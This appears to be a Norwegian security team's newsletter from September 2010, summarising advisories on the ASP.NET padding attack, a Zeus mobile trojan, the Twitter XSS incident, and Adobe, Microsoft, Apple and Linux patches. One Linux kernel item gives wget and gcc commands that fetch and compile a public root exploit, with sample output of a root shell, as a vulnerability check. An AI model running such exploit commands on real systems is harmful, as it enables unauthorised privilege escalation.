Det har vært et rolig døgn.
Det er ingen nye saker siden sist.
Sikkerhetsoppdateringen til ASP.NET svakheten (MS10-070) har blitt lansert. Sans Internet Storm Center har økt deres InfoCon-nivå til gult for å understreke alvorligheten av denne svakheten (Info: http://isc.sans.edu/diary.html?storyid=9625).
Som vi meldte fra om i gårsdagens nyhetsbrev, har nå sikkerhetspatchen til ASP.NET blitt lansert. Vi anbefaler alle å oppdatere ved første og beste anledning. | ||||
Referanser | ||||
---|---|---|---|---|
http://www.microsoft.com/technet/security/bulletin/ms10-070.mspx |
Microsoft slipper oppdatering for ASP.Net i løpet av dagen.
Microsoft melder at de i løpet av dagen kommer til å slippe en oppdatering som fikser svakheten i Security Bulletin #2416728. Denne svakheten, som vi skrev om i nyhetsbrevet 20/09, ekisterer i ASP.net, og gir en angriper mulighet til å lese og endre viewstate som har blitt kryptert av server. Det anbefales å installere den så fort den foreligger. | ||||
Anbefaling | ||||
---|---|---|---|---|
Installer oppdateringen så fort den foreligger. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx http://www.microsoft.com/technet/security/advisory/2416728.mspx |
S21sec har publisert detaljer rundt en variant av banktrojaneren Zeus som også tar over offerets mobiltelefon.
Sikkerhetsselskapet S21sec har publisert detaljer rundt en interessant variant av banktrojaneren Zeus som også installerer en trojaner på offerets mobiltelefon. Mobiltrojaneren vil kjøre i bakgrunnen og videresende SMS-meldinger til angriperen, noe som kan gjøre det mulig for angriperen å få tilgang til systemer beskyttet av 2-faktor autentisering som benytter SMS. I tillegg vil mobiltelefonen kunne motta kommandoer fra angriper for å endre oppføringer i kontaktlisten. For flere detaljer, se http://securityblog.s21sec.com/ | ||||
Referanser | ||||
---|---|---|---|---|
http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-ii.html http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-iii.html |
Twitter sårbar for en alvorlig Cross-site-scripting svakhet.
En alvorlig svakhet har blitt oppdaget i Adobe Flash Player 10.1.82.76 og tidligere. Oppdatering foreligger.
Twitter ble i går utsatt for en Cross-site-scripting (XSS) svakhet som i løpet av noen timer ble hyppig utnyttet til å vise pop-up meldinger eller redirigere brukere til tredjeparts websider, deriblant porno-sider. Svakheten, som gjorde det mulig å plassere javascript-kode med "onMouseOver"-funksjonskall i en twitter-melding, førte til at brukere ble servert pop-up meldinger eller videresendt til andre websider ved å kun bevege/føre musen over meldingen. Mange meldinger inneholdt i tillegg kode som re-twitret den orginale meldingen uten brukerens viten. Svakheten ble tettet av Twitter etter omlag 4,5 time. | ||||
Referanser | ||||
---|---|---|---|---|
http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html |
Det eksisterer en sårbarhet i Adobe Flash Player 10.1.82.76 og tidligere versjoner for Windows, Macintosh, Linux, Solaris og Android. Dette gjelder i tillegg Adobe Reader 9.3.4 og tidligere utgaver. Et vellykket angrep vil føre til at applikasjonen kræsjer, samtidig som angriperen gis full tilgang til det utsatte systemet. Adobe har lansert en patch som løser problemene. For nærmere detaljer, henviser vi til referansen fra Adobe. |
||||
Anbefaling | ||||
---|---|---|---|---|
Last ned sikkerhetsoppdatering. | ||||
Referanser | ||||
http://www.adobe.com/support/security/bulletins/apsb10-22.html |
Microsoft har kommet ut med en advarsel om en svakhet i ASP.NET og Linux-kjernen er sårbar for en svakhet i 32-bits emuleringen. Begge disse rangeres som kritisk og blir aktivt utnyttet.
Microsoft har kommet med informasjon om en svakhet i ASP.NET som vil gi en angriper mulighet til å lese og endre viewstate som er blitt kryptert av server. Viewstate brukes i ASP .NET for å kunne beholde tilstanden (state) mellom ulike postback til webserver, og gjøres ved at nettsiden inneholder et skjult kryptert felt som lagrer den nødvendige informasjonen. Angrepet utføres ved å modifisere viewstate og sende dette tilbake til server for så å observere responsen fra server. Ved å gjøre dette gjenatte ganger skal det være mulig å tilegne seg nok informasjon til å kunne dekryptere, lese, samt modifisere viewstate som sendes tilbake til server. Denne svakheten er allerede blitt demonstrert (av forskere), og vi vet jo at kriminelle ikke ligger på latsiden. |
||||
Anbefaling | ||||
---|---|---|---|---|
Vent på patch ifra Microsoft. | ||||
Referanser | ||||
https://www.microsoft.com/technet/security/advisory/2416728.mspx http://it.slashdot.org/story/10/09/19/1941258/Researchers-Demo-ASPNET-Crypto-Attack http://it.slashdot.org/story/10/09/13/167239/New-Crypto-Attack-Affects-Millions-of-ASPNET-Apps |
Exploitkode har blitt publisert på hvordan du kan utnytte et sikkerhetshull i Linux-kjernen for å øke dine egne rettigheter til å gi deg root-tilgang. Koden benytter seg av en svakhet i kompatibilitetsmodusen til kjernen som gjør at du kan kjøre 32-bits-applikasjoner på x86_64-arkitektur. Utviklerne av Linux-kjernen har laget en patch for å fikse problemet, men denne har ikke blitt pushet ut til de stabile utgivelsene enda. Se vedlegg for informasjon om hvordan en kan verifisere svakheten. |
||||
Anbefaling | ||||
---|---|---|---|---|
Inntil det kommer ny utgave av Linux-kjernen, skru av 32-bits-emulering. Dersom du benytter en distribusjon som publiserer egne patchede versjoner av Linuxkjerna, så anbefaler vi at du oppgraderer til siste utgave. Det er også mulig å slå av muligheten for å kjøre 32-bits programmer på et 64-bits system. Dersom du vil teste om systemet ditt er sårbart, kan du laste ned exploitkoden, og kjøre følgende kommandoer: bruker@server$ wget http://sota.gen.nz/compat2/robert_you_suck.c bruker@server$ gcc robert_you_suck.c -o robert Hvis systemet er sårbart, vil det se slik ut: bruker@server$ ./robert resolved symbol commit_creds to 0xffffffff8106ca60 resolved symbol prepare_kernel_cred to 0xffffffff8106cf90 mapping at 3f80000000 UID 0, EUID:0 GID:0, EGID:0 root@server# Hvis systemet ikke er sårbart, vil det se slik ut: bruker@server$ ./robert symbol table not available, aborting! Process finished |
||||
Referanser | ||||
http://seclists.org/fulldisclosure/2010/Sep/273 http://sota.gen.nz/compat2/ http://sota.gen.nz/compat2/robert_you_suck.c |
Mozilla har sluppet nye versjoner av Firefox og Apple har sluppet en ny versjon av QuickTime som fikser to kjente sårbarheter.
Mozilla har sluppet Firefox 3.5.13 og 3.6.10. De nye versjonene fikser et stabilitetsproblem som berører et lite knippe brukere. | ||||
Referanser | ||||
---|---|---|---|---|
http://www.mozilla.com/en-US/firefox/3.5.13/releasenotes/ http://www.mozilla.com/en-US/firefox/3.6.10/releasenotes/ |
Apple har nå sluppet QuickTime 7.6.8, og den nye versjonen fikser to sårbarheter. Den første svakheten skyldes en feil i input-valideringen i en QuickTime ActiveX-kontroll. Utnyttelse kan føre til eksekvering av vilkårlig kode. Den andre svakheten forårsakes av en feil relatert til usikker innlasting av DLL-filer. Utnyttelse kan føre til at en angriper får eksekvert skadelig kode. |
||||
Anbefaling | ||||
---|---|---|---|---|
Oppdater så snart som mulig | ||||
Referanser | ||||
http://support.apple.com/kb/HT4339 |
Google har sluppet en oppdatering til Chrome.
Google har sluppet en oppdatering til Chrome som fikser 10 ulike svakheter. Oppdateringen gjelder for både Windows, OS X og Linux. | ||||
Anbefaling | ||||
---|---|---|---|---|
Referanser | ||||
http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_14.html |
Microsoft har sluppet 9 oppdateringer hvorav 4 er vurdert som kritiske. Vi anbefaler å oppdatere snarest.
Det har blitt oppdaget en sårbarhet i printspooler-tjenesten til Microsoft Windows. Ved å sende en spesialutviklet pakke til et sårbart system som eksponerer dette grensesnittet via RPC-tjenesten kan en angriper kjøre vilkårlig programkode. | ||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://go.microsoft.com/fwlink/?LinkId=200505 |
Microsoft har identifisert en sårbarhet i Outlook. Dersom offeret er tilkoblet en online Exchange server, kan det oppstå en "heap overflow"-feil ved prosessering av korrupte TNEF-meldinger. Et vellykket angrep vil gi eksterne angripere mulighet til å ta fullstendig kontroll over et sårbart system. | ||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/MS10-064.mspx |
Microsoft Windows og Office inneholder en sårbarhet som kan utnyttes av eksterne angripere til å ta fullstendig kontroll over et sårbart system. Dette problemet skyldes en ugyldig indeks i Unicode-skriptprosessoren (USP10.DLL) ved håndtering av tabeller som benytter fontlayouten OpenType. Som med MS10-062 kan du også her bli utsatt for et angrep ved å besøke en spesialdesignet webside. | ||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/ms10-063.mspx |
En sårbarhet har blitt identifisert i Windows som kan utnyttes av eksterne angripere til å ta fullstendig kontroll over et sårbart system. Problemet skyldes en "integer underflow"-feil i MPEG-4-kodeken ved prosessering av korrupte mediefiler. Dersom en sårbar klient besøker en spesialdesignet webside hvor en slik mediefil er tilgjengelig vil angriperen ha mulighet til å kjøre vilkårlig kode. | ||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/MS10-062.mspx |
Oppdateringen fikser tre svakheter i IIS hvorav en av dem har vært publisert offentlig. Den mest alvorlige av dem kan medføre at man får kjørt ondsinnet programkode ved hjelp av en spesielt utformet HTTP-forespørsel mot tjeneren. Dersom et slikt angrep er vellykket vil en tredjepart kunne oppnå full kontroll over systemet. | ||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx |
Denne svakheten kan gjøre det mulig for en tredjepart å oppnå rettighetseskalering i sårbare systemer konfigurert med kinesisk, japansk eller koreansk "system locale" (valg av språk, tegnsett etc.). Et vellykket angrep vil gi en tredjepart mulighet til å kjøre ondsinnet programkode, full kontroll over data og tilgang til å legge til nye brukerkontoer med fulle rettigheter. |
||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/ms10-069.mspx |
Denne oppdateringen rette opp en innrapportert svakhet i AD (Active Directory), ADAM (Active Directory Application Mode) og AD LDS (Active Directory Lightweight Directory Service). Ved å utforme en spesiell LDAP (Lightweight Directory Access Protocol)-melding til en LSASS-tjener kan en angriper oppnå en rettighetseskalering. For et slikt angrep er angriperen avhengig av å ha tilgang til en konto i windows-domenet hvor tjenerne står, men klienten som benyttes i angrepet behøver ikke å være innmeldt i domenet. |
||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/ms10-068.mspx |
Det er oppdaget en svakhet som gjør det mulig å kjøre ondsinnet programkode ved å få brukeren av en klient til å åpne en spesielt utformet fil i WordPad. Dersom dette er vellykket vil en tredjepart kunne få kontroll over systemet med de samme rettigheter som den innloggede brukeren (som åpnet filen i WordPad). | ||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/ms10-067.mspx |
Ved å sende en spesielt utformet RPC-respons som svar til en RPC-forespørsel initiert av en klient kan det være mulig å få kjørt ondsinnet programkode på klienten. En angriper vil altså måtte få en bruker til å initiere en RPC-tilkobling mot en ondsinnet server som er under kontroll av angriperen og krever således brukerinteraksjon. Dersom angrepet er vellykket vil en tredjepart få kontroll over systemet. |
||||
Anbefaling | ||||
---|---|---|---|---|
Vi anbefaler at man oppdaterer snarest. | ||||
Referanser | ||||
http://www.microsoft.com/technet/security/bulletin/ms10-066.mspx |
Zero-day svakhet i Adobe Flash. Vi anbefaler å oppgradere til neste versjon så snart denne foreligger.
Det har blitt oppdaget en feil i Adobe Flash som kan føre til minnekorrupsjon, og som kan utnyttes av en angriper til å kjøre skadelig kode. For å utnytte svakheten, må angriperen lure brukeren til å åpne et spesielt utformet HTML-dokument med SWF-innhold. Det finnes i skrivende stund ingen oppdatering som fikser svakheten. | ||||
Anbefaling | ||||
---|---|---|---|---|
Deaktiver Flash i browseren din og hold utkikk etter en oppdatering. | ||||
Referanser | ||||
http://www.adobe.com/support/security/advisories/apsa10-03.html |
Microsoft har sluppet detaljer om denne månedens patcher, samt exploitkode for 0-dags svakheten i Adobe Acrobat Reader er blitt sluppet i metasploit.
Microsoft melder at de kommer til å slippe 9 oppdateringer tirsdag 14 September. Oppdateringene som slippes vil fikse totalt 13 ulike svakheter i Windows, Internet Information Services (IIS) og Office. 4 av oppdateringene blir rangert som kritiske, mens resten rangeres som viktige. | ||||
Referanser | ||||
---|---|---|---|---|
http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx |
Exploitkode for å utnytte 0-dags svakheten i Adobe Acrobat Reader er blitt gjort tilgjengelig i metasploit rammeverket. Koden er derfor lett tilgjengelig for alle som måtte ha interesse av den, og vi må derfor regne med at denne raskt plukkes opp av flere exploitkit. | ||||
Anbefaling | ||||
---|---|---|---|---|
Referanser | ||||
http://www.adobe.com/support/security/advisories/apsa10-02.html http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html http://blog.metasploit.com/2010/09/return-of-unpublished-adobe.html |
Både Mozilla og Apple har kommet med nye versjoner av sine nettleser som fikser flere sikkerhetshull. I tillegg har Adobe kommentert og kommet med anbefalinger ifbm en 0-day svakhet i Adobe Acrobat/Reader. Denne svakheten utnyttes pr nå.
Versjon 4.1 og 5.0 av Safari har blitt sluppet, og flere svakheter har blitt rettet. Begge versjonene adresserer de samme sikkerhetsproblemene. Brukere av nettleserne anbefales å oppgradere til nyeste versjon. Vi henviser til kilden hos Apple for mer informasjon. | ||||
Referanser | ||||
---|---|---|---|---|
http://support.apple.com/kb/HT4333 |
Mozilla Firefox er ute i ny versjon og skal fikse flere sårbarheter som er rapportert i tidligere versjoner. | ||||
Referanser | ||||
---|---|---|---|---|
http://www.mozilla.com/en-US/firefox/3.6.9/releasenotes/ |
Det er oppdaget exploitkode som utnytter en ny svakhet i Adobe Reader's håndtering av fonter. Adobe har publisert en sikkerhetsvarsel som omhandler sårbarheten, og de jobber med å rette problemet. | ||||
Anbefaling | ||||
---|---|---|---|---|
Ikke åpne PDF-filer fra usikre kilder. | ||||
Referanser | ||||
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html http://www.adobe.com/support/security/advisories/apsa10-02.html |
Det har vært et rolig døgn.
Krypteringsapplikasjonen Truecrypt har kommet med den første oppdateringen til versjon 7.0. I følge utviklerne vil denne utgaven fikse stabilitetsproblemer som inntreffer på flere utgaver av Microsoft Windows. Disse problemene inntreffer dersom OS-partisjonen er kryptert, og systemet settes i dvalemodus. Oppdateringen vil også fikse andre småproblemer som er gjeldende på alle platformer. Utviklerne anbefaler alle brukere til å oppdatere. |
||||
Referanser | ||||
---|---|---|---|---|
http://www.truecrypt.org/docs/?s=version-history |
Microsoft har sluppet versjon 2.0 av EMET, et verktøy som kan benyttes for å øke sikkerheten på enkelte utsatte applikasjoner. Google har sluppet versjon 6.0 av nettleseren Chrome. Den nye versjonen inneholder flere sikkerhetsoppdateringer.
Google har sluppet versjon 6.0 av nettleseren Chrome. Denne oppdateringen utbedrer 14 svakheter av forskjellig alvorlighetsgrad. Den nye versjonen har også andre nyheter som nytt brukerinterface, synkronisering av extensions, automatisk utfylling av forms og forbedret hastighet og stabilitet. Det anbefales å oppdatere. | ||||
Referanser | ||||
---|---|---|---|---|
http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html |
Microsoft har sluppet versjon 2.0 av deres Enhanced Mitigation Experience Toolkit (EMET). Dette er et verktøy for å gjøre det vanskeligere å utnytte svakheter i applikasjoner. Verktøyet lar brukeren slå på avanserte sikkerhetsfunksjoner i applikasjoner som opprinnelig ikke har støttet dette. Dette kan gjøres uten å rekompilere programmene som skal beskyttes. Les Microsofts bloggpost for flere detaljer. | ||||
Referanser | ||||
---|---|---|---|---|
https://www.microsoft.com/downloads/details.aspx?FamilyID=c6f0a6ee-05ac-4eb6-acd0-362559fd2f04&displayLang=en http://blogs.technet.com/b/srd/archive/2010/09/02/enhanced-mitigation-experience-toolkit-emet-v2-0-0.aspx http://www.h-online.com/security/news/item/Microsoft-hardening-tool-with-graphical-user-interface-1072173.html |
Passordmanageren Keepass er sårbar for den mye omtalte .dll hijacking svakheten i Microsoft Windows.
Keepass er en opensource passordmanager til Windows. Svakheten er relatert til en større feil som ble oppdaget i måten Windows applikasjoner søker etter og kjører .dll filer. En angriper kan utnytte svakheten ved å laste opp ondsinnede filer til et share, lokalt eller remote, hvor Windows vil søke etter og eksekvere de ondsinnede filen(e). Keepass har ikke kommet ut i ny offisiell versjon enda, men de har gitt ut en patch som fikser svakheten. | ||||
Anbefaling | ||||
---|---|---|---|---|
Patch kan hentes ned her: http://keepass.info/filepool/KeePass_100829b.zip | ||||
Referanser | ||||
http://www.securityfocus.com/archive/1/513446 |